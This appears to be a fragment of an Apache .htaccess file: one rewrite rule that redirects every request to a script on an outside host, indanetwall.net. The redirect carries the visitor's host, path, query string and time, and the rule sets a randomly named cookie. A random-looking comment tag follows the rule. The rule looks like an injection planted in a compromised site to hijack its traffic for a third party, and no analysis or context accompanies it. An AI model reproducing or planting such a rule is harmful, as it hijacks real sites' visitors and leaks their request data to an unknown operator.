RewriteRule ^(.*)$   http://indanetwall.net/cgi-bin/r.cgi?p=10003&i=a7d0bde5&j=311&m=c7686090ec6b45a00edbf623e489dbf0&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME}  [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo